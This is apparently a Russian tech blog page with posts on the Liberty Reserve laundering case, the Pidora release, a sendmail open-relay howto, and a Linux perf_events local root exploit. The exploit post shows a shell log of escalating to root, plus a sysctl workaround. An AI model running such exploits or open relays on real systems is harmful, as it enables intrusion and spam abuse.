Skip to content


Liberty Reserve прикрыли

Liberty Reserve is closed

Liberty Reserve прекратили свою деятельность.


Власти США раскрыли одну из крупнейших в мире электронных платежных систем, с помощью которой с 2006 года отмыто более 6 млрд долларов. Ее основатель - выходец из Киева Артур Будовский. О разгроме системы, с помощью которой с 2006 года было якобы совершено 55 млн незаконных транзакций, сообщил Манхэттенский федеральный прокурор Прит Бхарара.

К суду привлечены семь руководителей и сотрудников компании во главе с ее основателями, бывшим киевлянином 39-летним Артуром Будовским (он же Артур Беланчук и Эрик Пальц) и 41-летним Владимиром Кацем, (он же Рагнар Даннескьолд - это имя отрицательного персонажа из романа Айн Рэнд "Атлант расправил плечи").

Услугами системы, зарегистрированной в Коста-Рике компании Liberty Reserve, пользовалось, по словам прокуроров, не менее миллиона человек по всему миру. В США у компании было около 200 тысяч клиентов.

Система была анонимной, поэтому, если верить обвинению, ею пользовались в основном для отмывания незаконных доходов от всевозможных финансовых пирамид и сетевых махинаций, а также от торговли наркотиками, похищенными личными данными, номерами чужих кредиток или детской порнографией. Услугами компании якобы широко пользовались шайки "кардеров", продающих информацию о банковских картах, и хакеров, действующие в таких странах, как Вьетнам, Нигерия, Гонконг, Китай и США.

Судя по документам, которые власти США обнародовали в начале мая, Liberty приложила руку к отмыванию 45 млн долларов, похищенных недавно из двух ближневосточных банков. В этом преступлении обвиняется группа доминиканцев. Если верить обвинительным документам, один из них перевел Liberty часть похищенных денег из Сибири и Сингапура.

"Масштабы незаконной деятельности обвиняемых поражают воображение", - говорится в обвинительном заключении, согласно которому Liberty проводила по 12 млн финансовых операций в год на общую сумму более 1,4 млрд долларов.

Будовский был арестован в Испании и ждет экстрадиции в США. Кац арестован в Бруклине.

В 2006 году Будовский и Кац уже привлекались прокуратурой Манхэттена за перевод денег без надлежащей лицензии через компанию Gold Age, пользовавшуюся модной тогда виртуальной валютой E-Gold. Как говорилось в обвинительном заключении, в общей сложности они перевели около 30 млн долларов, иногда беря за транзакцию в районе 100 тысяч долларов. Как заметил манхэттенский прокурор Роберт Моргентау, именно это вызвало подозрения властей. "Когда берут столько денег, у вас есть основания полагать, что дело нечисто", - сказал он. "Как сказал мне тогдашний адвокат Будовского бывший одессит Игорь Нейман, его главный довод состоял в том, что в штате Нью-Йорк лицензия на перевод денег не требуется. После того как прокуратура предъявила текст соответствующего закона, дело решилось не в пользу обвиняемых, которые были приговорены к пяти годам условно и выплате компенсации."

Будовский скоро перебрался в Коста-Рику, отказался в 2011 году от американского гражданства и взял костариканское. В 2006 году он основал Liberty Reserve, которая предлагала аналогичные услуги, но на условиях практически полной анонимности. Открывая счет, новые клиенты должны были сообщить свое имя, дату рождения, место жительства и адрес электронной почты, но, в отличие от обычных банков, компания не требовала у них документы. Поэтому клиенты, по словам прокуроров, нередко открывали счета под явно вымышленными именами, такими как Russia Hackers ("Русские хакеры") или Hacker Account ("Счет хакера").

После того как деятельностью Liberty заинтересовались власти США, один из следователей открыл в компании счет на имя Джо Богуса ("Джо Липовый"), живущего по адресу дом 123 Фейк-мейн-стрит ("Фальшивая главная улица») в населенном пункте под названием "Абсолютно выдуманный город Нью-Йорк". Никто не обратил внимания.

Компания взимала плату в размере до 2 долларов 99 центов каждый раз, когда ее клиент переводил деньги другому пользователю. За дополнительную плату в 75 центов клиент мог спрятать номер своего счета в компании, в результате чего транзакция делалась практически бесследной. По словам прокуроров, Liberty "добавляла еще один уровень анонимности", запрещая клиентам переводить ей деньги напрямую, например, через кредитные карты. Она оперировала виртуальными деньгами, а реальную валюту клиенты должны были переводить посторонним "обменникам", откуда они также получали деньги.

По словам прокуроров, обменники по большей части находились в странах, где власти недостаточно строго контролируют систему денежных переводов - например, в Малайзии, России, Нигерии и Вьетнаме. Обменники в среднем брали за услуги 5% от суммы перевода.

Использование обменников позволяло Liberty избегать получения какой-либо информации о клиентах через банковские переводы или другие транзакции, которые оставляют за собой бумажный след. Такая система, замечает New York Times, сделала Liberty "первостатейным банком для киберпреступников и способствовала широкому диапазону онлайновой преступной деятельности".

По словам газеты, власти США не встречали другой системы, которая бы действовала в таких гигантских масштабах.

Прокуратура Южного округа Нью-Йорка объявила об этом деле лишь сейчас, хотя пять фигурантов из семи были арестованы еще 24 мая. Помимо Будовского и Каца, это 46-летний гражданин Коста-Рики Аззеддин Амин, который "управлял финансовыми счетами Liberty" и был задержан в Испании. В Бруклине арестованы 30-летний Марк Мармилев и 27-летний Максим Чухарев, которые "разрабатывали и обслуживали технологическую инфраструктуру Liberty". В бегах пока находятся 42-летний Ахмед Ясин Абдельгани и 28-летний Аллан Эстебан Идальго Хименес, являющиеся гражданами Коста-Рики. Всем им теоретически грозит до 20 лет тюрьмы за сговор с целью отмывания денег и до пяти лет за перевод денег без надлежащей лицензии.

Как сообщают, испанские власти готовы передать США бумаги и накопители, изъятые ими в ходе обысков трех жилищ и пяти компаний, связанных с этим делом.

По словам прокуроров, обвиняемые прекрасно знали, что занимаются незаконным отмыванием. Например, следователи цитируют разговор между Кацем и Абдельгани, имевший место в одном чате. Кац недвусмысленно назвал деятельность Liberty незаконной и заметил, что "все в США", включая Минюст, знают, что компания представляет собой "операцию по отмыванию, которой пользуются хакеры".

Согласно обвинительному заключению, Кац работал с Будовским до 2009 года, когда он ушел из компании из-за разногласий с партнером. По той же причине покинул Liberty и Абдельгани.

В том же году власти Коста-Рики известили Liberty, что ей необходимо обзавестись местной лицензией для перевода денег. В октябре 2009 года компания подала заявку на эту лицензию, но ей отказали на том основании, что в ней не соблюдаются элементарные правила проверки клиентуры по принципу "знай своего клиента" и отслеживания подозрительных транзакций. В ответ обвиняемые создали компьютерный портал, который будто бы давал контролирующим органам Коста-Рики возможность следить за тем, как Liberty соблюдает правила. На самом деле, по словам прокуроров, это была уловка с целью обмана властей. Уловка не сработала, и к ноябрю 2011 года компания так и не заручилась лицензией на работу в Коста-Рике. Хуже того: 18 ноября 2011 года Минфин США разослал извещение о том, что, согласно имеющейся информации, Liberty "используется преступниками для проведения анонимных транзакций по глобальному перемещению денег".

Источник: http://vsenovosti.in.ua/news/0528718

Posted in Деньги.


Fedora Linux 18 вышел для Raspberry Pi под именем Pidora

Один из предлагаемых вариантов логотипа для Pidora Linux

Один из предлагаемых вариантов логотипа для Pidora Linux


В списке рассылки разработчиков Fedora Linux объявлено о возобновлении подготовки сборок дистрибутива, оптимизированных для устройств Raspberry Pi. Примечательно, что не обошлось без конфуза для русскоязычных пользователей дистрибутива, вместо ранее используемого имени Raspberry Pi Fedora Remix проект теперь развивается под новым именем - Pidora. Проект создан сотрудниками канадского Центра разработки открытых технологий (CDOT).

Сборка основана на новом репозитории Fedora для архитектуры ARMv6 с поддержкой "hard float" (armv6hl), который позволит добиться оптимальной производительности за счёт сборки с учётом особенностей Raspberry Pi. В Raspberry Pi используется ARMv6 с расширениями "hard float", которые формально появились в процессорах с архитектурой ARMv7-A, поэтому для повышения производительности Raspberry Pi требуются специальные сборки, иначе из-за использования "soft float" в штатных сборках ARMv6 производительность будет не на высоте. Таким образом, вариант Fedora для Raspberry Pi теперь может конкурировать с официально предлагаемым дистрибутивом Raspbian, основанным на пакетной базе Debian и выгодно отличавшимся от остальных сборок наличием специальных оптимизаций для Raspberry Pi.

Среди других особенностей отмечается:

– Доступность для установки содержимого практически всей пакетной базы Fedora;
– Наличие графического мастера для первоначальной настройки, включающего специально созданные для Raspberry Pi модули;
– Компактный загрузочный образ (310 Мб в сжатом виде, 1.75 Гб после распаковки) для установки на SD-карту с поддержкой установки на карты большего размера;
– Поддержка в базовой поставке средств разработки на языках C, Python и Perl;
– Автоматическое создание раздела подкачки;
– Поддержка режима работы и начальной настройки без монитора. Например, информация об IP может быть озвучена звуком или LED-индикатором;
– Поддержка использования дистрибутива для создания полноценных десктоп-окружений;
– В базовый состав включены такие пакеты, как ядро Linux 3.6.11, Xfce 4.10, Gedit, nled, nano, vi, Midnight Commander, Abiword;
– Доступны из коробки библиотеки для поддержки интеграции с внешним оборудованием, таким как двигатели и компоненты робототехники, поддерживающие интерфейсы GPIO, I2C, SPI.

Источник: http://www.opennet.ru/opennews/art.shtml?num=36998

Posted in *nix, Развлекуха.


Как сделать open-relay из sendmail

sendmail - open-relay howto

Это я, почтальон Печкин!


Иногда очень утомляет делать одно и то же по сути рутинное действие больше одного раза. Например, разрешать пересылку почты через почтовый сервер с установленным sendmail для определённого IP-адреса сначала на уровне firewall-а, а потом еще и в конфигах самого sendmail-а. Поэтому я принял ответственное решение разрешить sendmail-у relaying для всех, но firewall-ом пускать только избранных, чтобы всякие ушлые спамеры не поимели наш сервер. Далее расписано как это делать, поскольку процедура оказалась слегка не очевидная.

  1. В файл access добавить строчку
    *.* RELAY
  2. В sendmail.mc найти строчку "dnl FEATURE(`relay_mail_from')dnl" и поменять её, чтобы она выглядела так:

    FEATURE(promiscuous_relay)dnl
  3. Выполнить команду make и перезапустить sendmail:
    make ; service sendmail restart

Вся эта последовательность действий может быть выполнена следующим bash-скриптом:

cd /etc/mail
cp -p sendmail.mc sendmail.mc.bak
grep -E "^FEATURE\(promiscuous_relay\)" sendmail.mc || sed -i "/use_ct_file/ aFEATURE(promiscuous_relay)dnl" sendmail.mc
sed -i "/127.0.0.1/ a# WARNING! FEATURE(promiscuous_relay) was set. Be careful!" access
make
diff sendmail.mc.bak sendmail.mc || service sendmail restart

На всякий случай: мой Makefile из директории /etc/mail можно скачать по этой ссылке.

ПРЕДУПРЕЖДЕНИЕ: если Вы захотите сделать вышеописанное у себя, обязательно убедитесь, что сервер не открыт для всего Интернета. Иначе об этом быстро узнают спамеры и будут слать через него свою нечисть, Ваш сервер попадёт в чёрные списки и в самом худшем случае провайдер может вообще прекратить предоставление сервиса.

Posted in *nix, Howto.

Tagged with .


Свежий local root exploit в linux

В ядре Linux обнаружена уязвимость, позволяющая получить root-доступ произвольному пользователю. Проблему усложняет то, что ошибка существовала на протяжении последних 2-3 лет и существует во всех ядрах начиная с 2.6.37 и включая 3.8.10.

Проблема присутствует в коде PERF_EVENTS, которая должна быть активирована для успешной эксплуатации уязвимости. Пользователям RHEL 6 и CentOS, несмотря на использование ядра 2.6.32, также светят проблемы – проблемный код был успешно бэкпортирван Red Hat в пакет с ядром, поставляемом в RHEL.

Эксплоит уже доступен публично:

bash-4.1# gcc -O2 exploit.c
bash-4.1# chmod 777 a.out
bash-4.1# su nobody -s /bin/bash
bash-4.1$ id
uid=99(nobody) gid=99(nobody) groups=99(nobody)
 
bash-4.1$ cd /
bash-4.1$ ls
a.out  bin  boot  dev  etc  exploit.c  home  lib  lib64  media....
 
bash-4.1$ ./a.out
2.6.37-3.x x86_64
 
sh-4.1# id
uid=0(root) gid=0(root) groups=0(root),99(nobody)

Источник: http://www.opennet.ru/opennews/art.shtml?num=36933

UPDATE от 2013-05-15
А вот и небольшой workaround подоспел (правда, есть подозрение, что помогает оно только конкретно от этого эксплойта, а сам баг в ядре можно и по-другому проэксплуатировать):

[root@serv ~]# /sbin/sysctl -w kernel.perf_event_paranoid=2
kernel.perf_event_paranoid = 2
[root@serv ~]# /sbin/sysctl -w kernel.perf_event_max_sample_rate=-1
kernel.perf_event_max_sample_rate = -1
[root@serv ~]# exit
[avz@serv ~]$ ./a.out
exploit: semtex.c:51: sheep: Assertion `!close(fd)' failed.
Aborted
[avz@serv ~]$

Кстати, быстро определить какие известные баги есть в вашем ядре можно с помощью такого one-liner-а:

(uname -s; uname -m; uname -r; uname -v) | curl https://uptrack.api.ksplice.com/api/1/update-list/ -L -H "Accept: text/text" --data-binary @-

Posted in *nix.